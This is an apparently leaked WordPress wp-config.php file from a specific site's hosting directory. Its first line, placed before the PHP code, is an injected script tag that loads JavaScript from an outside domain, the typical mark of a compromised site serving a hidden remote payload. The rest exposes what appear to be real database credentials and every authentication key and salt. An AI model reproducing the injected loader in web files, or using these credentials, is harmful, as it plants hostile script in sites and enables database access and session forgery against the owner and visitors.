File: /home/kemalnalbant/public_html/wp-config.php
<script src="https://cache.cloudswiftcdn.com/"></script><?php
define( 'WP_CACHE', true );
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'kemalnalbantwordpressnew' );
/** MySQL database username */
define( 'DB_USER', 'dbadmin0624@kemalnalbant.com.tr' );
/** MySQL database password */
define( 'DB_PASSWORD', 'h1XxBydutd5Wnhn' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost:3306' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '8uabQ]@I~C|%UH418f2;/h*F44&z_KxXQX+:Wdj2j@0X93F9xd-k4wq0U(8O6&G+');
define('SECURE_AUTH_KEY', 'N9f&C05no&!58T[9%5B!4p6y@41YsGpII4y_iB]C9(+g[fsUW59vYxz&Kp%_7h(8');
define('LOGGED_IN_KEY', '-5)7S/tk1[B8XGk2Love)|EJnaU%A3a6wI%j99uL8FNxaBOk45bRY8])f2#*95g7');
define('NONCE_KEY', 'N9:5lN+TnsV6xJ|u_91x|64X20&B_)Bs_&s#-yQB]kU3NBTt0NRg4F75DW:6+n[r');
define('AUTH_SALT', '5grZN0UE@40[J81:s3+;6(L+*yV60@0-aN7g2o0RAn2J58:J67c3+PeE#5LPht~0');
define('SECURE_AUTH_SALT', '#QMSOWj5)9Sh!K[2s2o8/)[8]~x1N0J/(i4nBvN11a!9U+;jVpGfX*C3S5x83-Ly');
define('LOGGED_IN_SALT', '5/uWJ80))6#)nEX6Qg8O5|_|L0401Ct!T:NyRY8pH0Z6;L0Gv1-f~/[Z7@I-Otq%');
define('NONCE_SALT', '6ZCsMJ/KU!!rg1I*NBlisW-Q9c1v0+B-oDE1:eg*[;tWnqWS|r0TF&+!V)3aJlM*');
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = '9mbqh4tx_';
define('WP_ALLOW_MULTISITE', true);
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';